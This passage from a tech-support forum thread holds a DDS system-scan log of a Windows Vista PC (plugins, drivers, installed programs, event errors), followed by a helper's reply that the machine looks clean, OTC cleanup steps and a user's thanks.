FF - plugin: c:\program files\opera\program\plugins\npFoxitReaderPlugin.dll
FF - plugin: c:\program files\opera\program\plugins\nppl3260.dll
FF - plugin: c:\program files\opera\program\plugins\nprpjplug.dll
FF - plugin: c:\users\lennon\appdata\local\google\update\1.2.183.13\npGoogleOneClick8.dll
FF - HiddenExtension: Microsoft .NET Framework Assistant: {20a82645-c095-46ed-80e3-08825760534b} - c:\windows\microsoft.net\framework\v3.5\windows presentation foundation\dotnetassistantextension\
FF - HiddenExtension: Java Console: No Registry Reference - c:\program files\mozilla firefox\extensions\{CAFEEFAC-0016-0000-0010-ABCDEFFEDCBA}
FF - HiddenExtension: Java Console: No Registry Reference - c:\program files\mozilla firefox\extensions\{CAFEEFAC-0016-0000-0012-ABCDEFFEDCBA}
FF - HiddenExtension: Java Console: No Registry Reference - c:\program files\mozilla firefox\extensions\{CAFEEFAC-0016-0000-0013-ABCDEFFEDCBA}
FF - HiddenExtension: Java Console: No Registry Reference - c:\program files\mozilla firefox\extensions\{CAFEEFAC-0016-0000-0017-ABCDEFFEDCBA}
---- FIREFOX POLICIES ----
c:\program files\mozilla firefox\greprefs\security-prefs.js - pref("security.ssl3.rsa_seed_sha", true);
============= SERVICES / DRIVERS ===============
R1 cmdGuard;COMODO Firewall Pro Sandbox Driver;c:\windows\system32\drivers\cmdguard.sys [2008-8-7 128376]
R1 cmdHlp;COMODO Firewall Pro Helper Driver;c:\windows\system32\drivers\cmdhlp.sys [2008-8-7 29520]
R1 MpFilter;Microsoft Malware Protection Driver;c:\windows\system32\drivers\MpFilter.sys [2009-6-18 142832]
R1 SASDIFSV;SASDIFSV;c:\program files\superantispyware\sasdifsv.sys [2009-11-11 9968]
R1 SASKUTIL;SASKUTIL;c:\program files\superantispyware\SASKUTIL.SYS [2009-11-11 74480]
R2 AERTFilters;Andrea RT Filters Service;c:\windows\system32\AERTSrv.exe [2007-12-5 77824]
R2 AMD External Events Utility;AMD External Events Utility;c:\windows\system32\atiesrxx.exe [2009-3-16 180224]
R2 postgresql-8.3;PostgreSQL Server 8.3;C:/Program Files/PostgreSQL/8.3/bin/pg_ctl.exe runservice -N "postgresql-8.3" -D "C:/Program Files/PostgreSQL/8.3/data" -w --> C:/Program Files/PostgreSQL/8.3/bin/pg_ctl.exe runservice -N
postgresql-8.3 [?]
R3 MpNWMon;Microsoft Malware Protection Network Driver;c:\windows\system32\drivers\MpNWMon.sys [2009-6-18 42480]
R3 NmPar;MosChip PCI Parallel Port;c:\windows\system32\drivers\NmPar.sys [2006-12-19 81408]
R3 SASENUM;SASENUM;c:\program files\superantispyware\SASENUM.SYS [2009-11-11 7408]
S2 gupdate1c9e852b942f080;Google Update Service (gupdate1c9e852b942f080);c:\program files\google\update\GoogleUpdate.exe [2009-6-8 133104]
S3 FontCache;Windows Font Cache Service;c:\windows\system32\svchost.exe -k LocalServiceAndNoImpersonation [2008-5-29 21504]
S3 IntelDH;IntelDH Driver;c:\windows\system32\drivers\IntelDH.sys [2008-4-24 5632]
S3 NPF;NetGroup Packet Filter Driver;c:\windows\system32\drivers\npf.sys [2008-5-21 34576]
S3 PSI;PSI;c:\windows\system32\drivers\psi_mf.sys [2009-6-17 12648]
=============== Created Last 30 ================
2009-11-29 20:11:39 0 d
w- C:\Rooter$
2009-11-28 18:49:16 0 d
w- c:\programdata\TrueCrypt
2009-11-25 03:01:53 2048 ----a-w- c:\windows\system32\tzres.dll
2009-11-25 02:58:38 1401856 ----a-w- c:\windows\system32\msxml6.dll
2009-11-25 02:58:37 1248768 ----a-w- c:\windows\system32\msxml3.dll
2009-11-25 02:58:35 714240 ----a-w- c:\windows\system32\timedate.cpl
2009-11-20 15:42:41 0 d
w- c:\users\lennon\appdata\roaming\Malwarebytes
2009-11-20 15:42:36 38224 ----a-w- c:\windows\system32\drivers\mbamswissarmy.sys
2009-11-20 15:42:35 19160 ----a-w- c:\windows\system32\drivers\mbam.sys
2009-11-20 15:42:35 0 d
w- c:\programdata\Malwarebytes
2009-11-20 15:42:35 0 d
w- c:\program files\Malwarebytes' Anti-Malware
2009-11-20 15:36:57 0 d
w- c:\programdata\SUPERAntiSpyware.com
2009-11-20 15:36:46 0 d
w- c:\users\lennon\appdata\roaming\SUPERAntiSpyware.com
2009-11-20 15:36:46 0 d
w- c:\program files\SUPERAntiSpyware
2009-11-20 02:40:08 0 d
w- c:\program files\MakeMKV
2009-11-11 09:40:51 2036736 ----a-w- c:\windows\system32\win32k.sys
2009-11-11 09:38:52 355328 ----a-w- c:\windows\system32\WSDApi.dll
2009-11-07 15:52:37 0 d
w- c:\programdata\XHEO INC
2009-11-04 14:32:36 0 d
w- c:\program files\Windows Portable Devices
2009-11-04 14:32:29 0 ---ha-w- c:\windows\system32\drivers\Msft_User_WpdMtpDr_01_07_00.Wdf
2009-11-04 14:31:57 0 ---ha-w- c:\windows\system32\drivers\Msft_User_WpdFs_01_07_00.Wdf
2009-11-04 14:29:49 81920 ----a-w- c:\windows\system32\wpdbusenum.dll
2009-11-04 14:28:48 4096 ----a-w- c:\windows\system32\oleaccrc.dll
2009-11-04 14:28:48 234496 ----a-w- c:\windows\system32\oleacc.dll
2009-11-04 14:28:47 555520 ----a-w- c:\windows\system32\UIAutomationCore.dll
2009-11-04 13:06:07 1638912 ----a-w- c:\windows\system32\mshtml.tlb
2009-11-03 19:53:49 0 d
w- c:\program files\iPod
2009-11-03 19:53:48 0 d
w- c:\program files\iTunes
2009-11-01 14:27:40 0 d
w- C:\962431762f6499d25e8db0e08e090e
2009-10-31 14:17:13 0 d
w- C:\5cc8389e2cb2f2f5fc5f494a07
2009-10-31 03:47:16 0 d
w- c:\program files\MyDefrag v4.2.4
==================== Find3M ====================
2009-11-28 18:49:13 223440 ----a-w- c:\windows\system32\drivers\truecrypt.sys
2009-11-26 15:34:35 171552 ----a-w- c:\windows\system32\guard32.dll
2009-11-26 15:34:29 128376 ----a-w- c:\windows\system32\drivers\cmdguard.sys
2009-11-22 16:35:22 29520 ----a-w- c:\windows\system32\drivers\cmdhlp.sys
2009-11-08 01:24:26 411368 ----a-w- c:\windows\system32\deploytk.dll
2009-11-04 14:32:33 665600 ----a-w- c:\windows\inf\drvindex.dat
2009-11-04 14:32:33 51200 ----a-w- c:\windows\inf\infpub.dat
2009-11-04 14:32:32 143360 ----a-w- c:\windows\inf\infstrng.dat
2009-11-04 14:32:32 143360 ----a-w- c:\windows\inf\infstor.dat
2009-11-02 20:42:06 195456
w- c:\windows\system32\MpSigStub.exe
2009-10-03 19:01:00 85504 ----a-w- c:\windows\system32\ff_vfw.dll
2009-10-01 01:02:17 2537472 ----a-w- c:\windows\system32\wpdshext.dll
2009-10-01 01:02:05 30208 ----a-w- c:\windows\system32\WPDShextAutoplay.exe
2009-10-01 01:02:04 334848 ----a-w- c:\windows\system32\PortableDeviceApi.dll
2009-10-01 01:02:02 87552 ----a-w- c:\windows\system32\WPDShServiceObj.dll
2009-10-01 01:02:00 31232 ----a-w- c:\windows\system32\BthMtpContextHandler.dll
2009-10-01 01:01:59 546816 ----a-w- c:\windows\system32\wpd_ci.dll
2009-10-01 01:01:59 160256 ----a-w- c:\windows\system32\PortableDeviceTypes.dll
2009-10-01 01:01:56 60928 ----a-w- c:\windows\system32\PortableDeviceConnectApi.dll
2009-10-01 01:01:56 350208 ----a-w- c:\windows\system32\WPDSp.dll
2009-10-01 01:01:56 196608 ----a-w- c:\windows\system32\PortableDeviceWMDRM.dll
2009-10-01 01:01:56 100864 ----a-w- c:\windows\system32\PortableDeviceClassExtension.dll
2009-10-01 01:01:54 40448 ----a-w- c:\windows\system32\drivers\WpdUsb.sys
2009-10-01 01:01:50 226816 ----a-w- c:\windows\system32\WpdMtp.dll
2009-10-01 01:01:49 61952 ----a-w- c:\windows\system32\WpdMtpUS.dll
2009-10-01 01:01:49 33280 ----a-w- c:\windows\system32\WpdConns.dll
2009-09-25 02:10:10 974848 ----a-w- c:\windows\system32\WindowsCodecs.dll
2009-09-25 02:07:08 189440 ----a-w- c:\windows\system32\WindowsCodecsExt.dll
2009-09-25 02:04:32 321024 ----a-w- c:\windows\system32\PhotoMetadataHandler.dll
2009-09-25 01:49:22 1554432 ----a-w- c:\windows\system32\xpsservices.dll
2009-09-25 01:48:08 351232 ----a-w- c:\windows\system32\XpsPrint.dll
2009-09-25 01:38:29 847360 ----a-w- c:\windows\system32\OpcServices.dll
2009-09-25 01:36:13 280064 ----a-w- c:\windows\system32\XpsGdiConverter.dll
2009-09-25 01:35:31 135680 ----a-w- c:\windows\system32\XpsRasterService.dll
2009-09-25 01:33:25 195584 ----a-w- c:\windows\system32\dxdiagn.dll
2009-09-25 01:33:15 829440 ----a-w- c:\windows\system32\d3d10warp.dll
2009-09-25 01:33:01 369664 ----a-w- c:\windows\system32\WMPhoto.dll
2009-09-25 01:32:59 252928 ----a-w- c:\windows\system32\dxdiag.exe
2009-09-25 01:31:53 519680 ----a-w- c:\windows\system32\d3d11.dll
2009-09-25 01:31:26 486912 ----a-w- c:\windows\system32\d3d10level9.dll
2009-09-25 01:31:21 161280 ----a-w- c:\windows\system32\d3d10_1.dll
2009-09-25 01:31:19 218112 ----a-w- c:\windows\system32\d3d10_1core.dll
2009-09-25 01:31:16 1030144 ----a-w- c:\windows\system32\d3d10.dll
2009-09-25 01:31:15 828928 ----a-w- c:\windows\system32\d2d1.dll
2009-09-25 01:30:23 481792 ----a-w- c:\windows\system32\dxgi.dll
2009-09-25 01:30:23 190464 ----a-w- c:\windows\system32\d3d10core.dll
2009-09-25 01:27:04 793088 ----a-w- c:\windows\system32\FntCache.dll
2009-09-25 01:27:04 37888 ----a-w- c:\windows\system32\cdd.dll
2009-09-25 01:27:04 1064448 ----a-w- c:\windows\system32\DWrite.dll
2009-09-24 22:54:55 258048 ----a-w- c:\windows\system32\winspool.drv
2009-09-24 22:54:53 667648 ----a-w- c:\windows\system32\printfilterpipelinesvc.exe
2009-09-24 22:54:52 26112 ----a-w- c:\windows\system32\printfilterpipelineprxy.dll
2009-09-10 16:48:01 218624 ----a-w- c:\windows\system32\msv1_0.dll
2009-09-10 14:59:26 8147456 ----a-w- c:\windows\system32\wmploc.DLL
2009-09-10 14:58:28 310784 ----a-w- c:\windows\system32\unregmp2.exe
2009-09-10 02:01:02 3023360 ----a-w- c:\windows\system32\UIRibbon.dll
2009-09-10 02:00:54 1164800 ----a-w- c:\windows\system32\UIRibbonRes.dll
2009-09-10 02:00:36 92672 ----a-w- c:\windows\system32\UIAnimation.dll
2009-09-04 11:41:59 60928 ----a-w- c:\windows\system32\msasn1.dll
2009-08-21 06:16:20 44 ---h--w- c:\program files\232e4158.tmp
2008-05-29 15:00:50 174 --sha-w- c:\program files\desktop.ini
2006-11-02 12:42:02 30674 ----a-w- c:\windows\inf\perflib\0409\perfd.dat
2006-11-02 12:42:02 30674 ----a-w- c:\windows\inf\perflib\0409\perfc.dat
2006-11-02 12:42:02 287440 ----a-w- c:\windows\inf\perflib\0409\perfi.dat
2006-11-02 12:42:02 287440 ----a-w- c:\windows\inf\perflib\0409\perfh.dat
2006-11-02 09:20:21 287440 ----a-w- c:\windows\inf\perflib\0000\perfi.dat
2006-11-02 09:20:21 287440 ----a-w- c:\windows\inf\perflib\0000\perfh.dat
2006-11-02 09:20:19 30674 ----a-w- c:\windows\inf\perflib\0000\perfd.dat
2006-11-02 09:20:19 30674 ----a-w- c:\windows\inf\perflib\0000\perfc.dat
2008-04-25 01:28:53 8192 --sha-w- c:\windows\users\default\NTUSER.DAT
============= FINISH: 0:11:11.35 ===============
UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
IF REQUESTED, ZIP IT UP & ATTACH IT
DDS (Ver_09-11-29.01)
Microsoft® Windows Vista™ Home Premium
Boot Device: \Device\HarddiskVolume3
Install Date: 24/04/2008 18:43:02
System Uptime: 29/11/2009 18:22:41 (6 hours ago)
Motherboard: Dell Inc. | | 0RY007
Processor: Intel(R) Core(TM)2 Duo CPU E6550 @ 2.33GHz | Socket 775 | 1998/333mhz
==== Disk Partitions =========================
C: is FIXED (NTFS) - 239 GiB total, 92.672 GiB free.
is FIXED (NTFS) - 10 GiB total, 5.788 GiB free.
E: is CDROM ()
F: is Removable
G: is Removable
H: is Removable
I: is Removable
==== Disabled Device Manager Items =============
==== System Restore Points ===================
RP796: 24/11/2009 04:50:47 - Scheduled Checkpoint
RP797: 24/11/2009 13:20:44 - Windows Update
RP798: 25/11/2009 02:17:47 - Scheduled Checkpoint
RP799: 25/11/2009 03:01:09 - Windows Update
RP800: 26/11/2009 15:37:20 - Windows Update
RP801: 27/11/2009 13:33:27 - Scheduled Checkpoint
RP802: 27/11/2009 21:42:39 - Windows Update
RP803: 28/11/2009 06:26:03 - Windows Update
RP804: 28/11/2009 18:43:10 - Installed Opera 10.10.
RP806: 28/11/2009 18:48:58 - TrueCrypt installation
RP807: 29/11/2009 18:34:07 - Windows Update
==== Installed Programs ======================
7-Zip 4.65
AC3Filter 1.62b
Adobe Flash Player 10 ActiveX
Adobe Flash Player 10 Plugin
AoA Audio Extractor 1.0
Apple Application Support
Apple Mobile Device Support
Apple Software Update
ATI Catalyst Install Manager
AutoHotkey 1.0.48.03
AviSynth 2.5
Betfair Poker
Betsafe Poker
Blue Face Network Tester
Bonjour
Browser Address Error Redirector
bwin Poker
CarbonPoker
Catalyst Control Center - Branding
Catalyst Control Center Core Implementation
Catalyst Control Center Graphics Full Existing
Catalyst Control Center Graphics Full New
Catalyst Control Center Graphics Light
Catalyst Control Center Graphics Previews Common
Catalyst Control Center Graphics Previews Vista
Catalyst Control Center HydraVision Full
Catalyst Control Center InstallProxy
Catalyst Control Center Localization All
ccc-core-static
ccc-utility
CCC Help Chinese Standard
CCC Help Chinese Traditional
CCC Help English
CCC Help Japanese
CCC Help Korean
CCC Help Thai
CDPoker
COMODO Firewall Pro
Compatibility Pack for the 2007 Office system
Dell Getting Started Guide
Dell Support Center
DellSupport
Eraser
Everest Poker (Remove Only)
FastStone Image Viewer 3.9
ffdshow [rev 3094] [2009-10-03]
FileHippo.com Update Checker
Foxit Reader
Gnuf.com Poker
Google Chrome
Google Earth
Google Update Helper
GrabIt 1.7.2 Beta 4 (build 997)
Haali Media Splitter
HijackThis 2.0.2
Holdem Manager
HollywoodPoker.com
Hotfix for Microsoft .NET Framework 3.5 SP1 (KB953595)
Hotfix for Microsoft .NET Framework 3.5 SP1 (KB958484)
Intel(R) Network Connections 13.5.32.0
IrfanView (remove only)
iTunes
Java(TM) 6 Update 17
JGoodies JDiskReport 1.3.1
KeePass Password Safe 1.16
Ladbrokes Poker
Littlewoods Poker
MakeMKV v1.4.8_beta
Malwarebytes' Anti-Malware
MansionPoker
Media Player Classic - Home Cinema v. 1.3.1249.0
MediaInfo 0.7.25
MeGUI (remove only)
Microsoft .NET Framework 3.5 SP1
Microsoft Antimalware
Microsoft Application Error Reporting
Microsoft Choice Guard
Microsoft Office PowerPoint Viewer 2007 (English)
Microsoft Office Professional Edition 2003
Microsoft Security Essentials
Microsoft Silverlight
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053
Microsoft Visual C++ 2005 Redistributable
Microsoft Works
mkv2vob
MKVtoolnix 2.9.8
MobileMe Control Panel
MosChip Multi-IO Controller
Mozilla Firefox (3.5)
Mozilla Firefox (3.5.5)
Mozilla Thunderbird (2.0.0.19)
Mozilla Thunderbird (2.0.0.23)
MSVCRT
MSXML 4.0 SP2 (KB936181)
MSXML 4.0 SP2 (KB941833)
MSXML 4.0 SP2 (KB954430)
MSXML 4.0 SP2 (KB973688)
MyDefrag v4.2.4
Noble Poker
Notepad++
OGA Notifier 2.0.0048.0
Opera 10.10
Pacific Poker
PartyPoker
PingPlotter Standard 3.30.0s
Poker
Poker 770
PokerStars
PokerStove version 1.21
PostgreSQL 8.3
Psi (remove only)
Purple Lounge
QuickPar 0.9
QuickTime
Real Alternative 2.0.1 Lite
Realtek High Definition Audio Driver
RedKings Poker
Roxio Creator Audio
Roxio Creator Copy
Roxio Creator Data
Roxio Creator DE
Roxio Creator Tools
Roxio Express Labeler 3
Roxio Update Manager
SABnzbd (remove only)
SeaMonkey (2.0)
Secunia PSI
Shareaza 2.5.0.0
Skins
SopCast 3.2.4
SUPERAntiSpyware Free Edition
Titan Poker
Tower Gaming
TrueCrypt
TVAnts 1.0
TVersity Codec Pack 1.2
TVersity Media Server 1.7.2.1 Beta
Update for Microsoft .NET Framework 3.5 SP1 (KB963707)
User's Guides
VLC media player 1.0.3
Winamp
Windows Live Call
Windows Live Communications Platform
Windows Live Essentials
Windows Live Messenger
Windows Live Sign-in Assistant
Windows Live Upload Tool
WinPcap 4.1 beta4
WinSCP 4.1.9
==== Event Viewer Messages From Past Week ========
29/11/2009 05:04:12, Error: Service Control Manager [7034] - The COMODO Internet Security Helper
Service service terminated unexpectedly. It has done this 1 time(s).
28/11/2009 16:39:27, Error: Service Control Manager [7000] - The SASDIFSV service failed to
start due to the following error: Cannot create a file when that file already exists.
28/11/2009 05:29:09, Error: Ntfs [137] - The default transaction resource manager on volume S:
encountered a non-retryable error and could not start. The data contains the error code.
==== End Of File ===========================0 -
looks fine, I wouldn't worry
- Download OTC to your desktop and run it
- Click Yes to beginning the Cleanup process and remove these components, including this application.
- You will be asked to reboot the machine to finish the Cleanup process. Choose Yes.
0 -
Thanks ASJ, I hope I can speak for others here when I say that we really appreciate the work you do in this forum.0
Advertisement